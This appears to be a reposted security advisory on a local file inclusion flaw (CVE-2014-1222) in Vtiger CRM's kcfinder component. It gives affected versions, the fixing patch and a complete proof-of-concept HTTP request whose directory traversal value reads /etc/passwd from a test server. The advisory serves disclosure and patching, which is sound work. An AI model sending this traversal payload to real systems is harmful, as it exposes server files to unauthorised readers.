Vtiger CRM 5.4.0 / 6.0 RC / 6.0.0 GA Local File Inclusion

2014.03.13
Credit: Jerzy Kramarz
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2014-1222
CWE: CWE-98


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Vulnerability title: Local File Inclusion in Vtiger CRM CVE: CVE-2014-1222 Vendor: Vtiger Product: CRM Affected version: Vtiger CRM 5.4.0, 6.0 RC & 6.0.0 GA Fixed version: Vtiger CRM 6.0.0 Security patch 1 Reported by: Jerzy Kramarz Details: A local file inclusion vulnerability was discovered in the 'kcfinder' component of the vtiger CRM 6.0 RC. This could be exploited to include arbitrary files via directory traversal sequences and subsequently disclose contents of arbitrary files. The following request is a Proof-of-Concept for retrieving /etc/passwd file from remote system. POST /vtigercrm6rc2/kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1 Host: 192.168.56.103 Proxy-Connection: keep-alive Content-Length: 58 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.56.103 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Content-Type: application/x-www-form-urlencoded DNT: 1 Referer: http://192.168.56.103/vtigercrm6rc2/kcfinder/browse.php Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4 Cookie: PHPSESSID=ejkcv9cl3efa861460ufr39hl2; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off dir=files&file=/../../../../../../../../../../../etc/passwd Note: In order to exploit this vulnerability an attacker has to be authenticated. Further details at: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1222/ Copyright: Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

References:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1222/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top